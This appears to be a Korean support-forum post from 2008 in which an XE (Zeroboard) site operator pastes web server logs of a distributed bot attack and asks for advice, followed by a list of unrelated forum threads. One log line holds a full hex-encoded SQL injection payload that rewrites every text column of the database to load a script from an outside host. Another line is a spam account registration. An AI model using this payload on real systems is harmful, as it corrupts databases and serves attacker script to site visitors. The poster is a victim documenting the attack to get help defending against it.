묻고답하기

  2. Support
  3. 묻고답하기

공격을 받는 것 같습니다.

2008.12.05 01:48

~도기

제로보드 xe 사용자입니다.

어제 밤에 늦게부터 갑자기 이상한 접속이 계속 들어오기 시작했습니다. 로그 내용을 보니 정상적인 접속이 아니라는 것은 분명하더군요.

대충 이렇습니다.

GET /zbxe/?mid=board_free&document_srl=3704965&page=&accept_agreement=&user_id=eEiZBaSXzuyTyCIF&password1=&password2=&user_name=Msadxfcz&nick_name=Msadxfcz&email_address=ermihgsg%40jpoblxse.com&homepage=http%3A%2F%2Fcodeine.cogiage.com%2Famben-plus-codeine-drug-interaction.html&blog=PMvJBaFlMBKqyPxgUIh&birthday=&allow_mailing=Y&open_sf=&sf=mfMiZrMJVQiCeUvpo&open_nateon=&nateon=vlQKdWLjkwHosAExZK&open_hobby=&hobby=GrcjrNrsUNmQedxkl&open_msn=&msn=ermihgsg%40jpoblxse.com HTTP/1.1" 200 80517

GET /zbxe/?document_srl=3391884';dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F732E6361776A622E636F6D2F732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);

분명히 정상적인 것은 아니고 아마도 '공격'이 아닐까 생각되는군요.


그런데 문제는 IP가 하나가 아니라는 것입니다. 그야말로 전세계... 대충 체크해본 IP 주소만 50개쯤은 되는데다 IP주소가 하나같이 일관성이 없습니다. (지역도 여기저기 무작위라고 할까요?)


일단 IP 차단이나 점검을 위하여 vhost 설정을 바꾸어 공사중 폴더(_contruction)만 나오도록 했더니 아예 이렇게 바뀌는군요.

GET /zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/?mid=club_trpg&document_srl=3403073&sort_index=voted_count&order_type=desc

GET /zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/files/attach/images/3617148/3617460/nostalghia_poster.jpg HTTP/1.1" 302 574

이를보면 봇이나 cgi로 보이는데 서버 운영에 대한 경험이 부족해서 해결 방법을 도저히 찾을 수가 없습니다.


그리하여 바로 지금 이 순간에도 무수한 접속이 들어오면서 로그를 무진장 늘려나가고 있습니다. 접속 차단 정도로는 의미가 없고....

어떻게 이런 상황이 생길 수 있는 것인지 도저히 알 수가 없군요.

제로보드의 내용을 분석해서 (이를테면 ?mid = 이라고 지정하지 해가면서) 부하를 늘려나가고 있는데, 혹시라도 이와 같은 문제를 겪으신 분이 계시는지요?

어찌할바를 모르기에 혹시라도 조언을 구할 수 있을까 문의해 봅니다.

참고로, 제로보드의 버젼은 1.1.1 입니다.
이 게시물을
좋아요
목록
글쓴이 제목 최종 글
XE 공지 글 쓰기,삭제 운영방식 변경 공지 [16] 2019.03.05 by 남기남
Faultier 로그인 유효성 아이디에 관하여 질문 file  
Kview 사진게시판만 다른 홈페이지로 끌어갈수 있나요????  
하얀뱀 xe 설치페이지가 안떠요. [2] 2011.11.16 by 하얀뱀
thisend XE 에디터스타일(서식기능) 파이어폭스에서는 왜 작동안할까요?  
샤르냥 팝업 답변 부탁드릴게요 ^^  
노엔젤 paint bbs 모듈이나 위젯은 없나요? [1] 2011.11.16 by 노엔젤
롱다리스머프 모바일 페이지 오류 file  
노엔젤 글쓰기 에디터툴에대해 질문있습니다. [1] file 2011.11.16 by 노엔젤
달빛밴드 1.5 버전 회원가입 모듈쪽 문의 file  
내맘에들어오면 댓글쓸때 별점 줄수있는 법 문의 드립니다.  
Goos 1.5로 만들기 시작한 사이트, 1.4로 다운그레이드 가능할까요? (소셜xe문제 포함)  
시골영감 송동우님!!! 죄송하지만 좀 도와주세요.(초기접속 화면 관련) [1] 2011.11.16 by 老姜君
무비스타 가입하기 폼을 줄이는 방법 알려주세요. file  
아담하와 포인트 차감 게시글 최상위로 올리기 기능 ..  
쿵푸팬더 이미지 드래그가 안됩니다.  
명드래곤 대용량 이미지 첨부시 썸네일이 생성되지 않습니다 ㅠ [1] 2011.11.17 by 물비늘
카이네드 본문옆에 top/down 이 옆에서 따라다니게 하고 싶습니다. [2] 2011.11.17 by 똑디
jwSeo xe 첨부파일 100%에서 증발문제 [1] 2011.11.17 by 굿총
simzi 제발좀 도와주세요!!! ;ㅂ; 우어어어엉  
wide222 모바일페이지로 앨범을 만들고 싶습니다.  
mrbj 관리자모드에서 [1] file 2011.11.17 by 송동우
alljoy 페이지에 플래시 파일넣을때.... [1] 2011.11.17 by 소나무 열매
제이빅 게시판 제거 문제와 댓글 등록시 '내용에 값을 입력해주세요' [1] file 2011.11.17 by 파이델
ibwj rss 내용 수정 질문드립니다.  
하지요! xe 게시물 내에 그 게시물 작성자가 쓴 최근 글 보여주기 기능?  
아라비카21 불러온 외부페이지에서 css/js가 적용되질 않습니다ㅠㅠ [1] 2011.11.17 by 이끼다
lovesan xe설치 폴더 이동................? [1] 2011.11.17 by 이끼다
준돌이 1.5 업데이트후 기절할것 같습니다... [1] 2011.11.18 by Goos
하늘384 회원 로그인  
스구루 자신의 글이나 댓글에 댓글이 달리면 알려주는 방법 [1] 2011.11.18 by 카이네드
태그 쓰기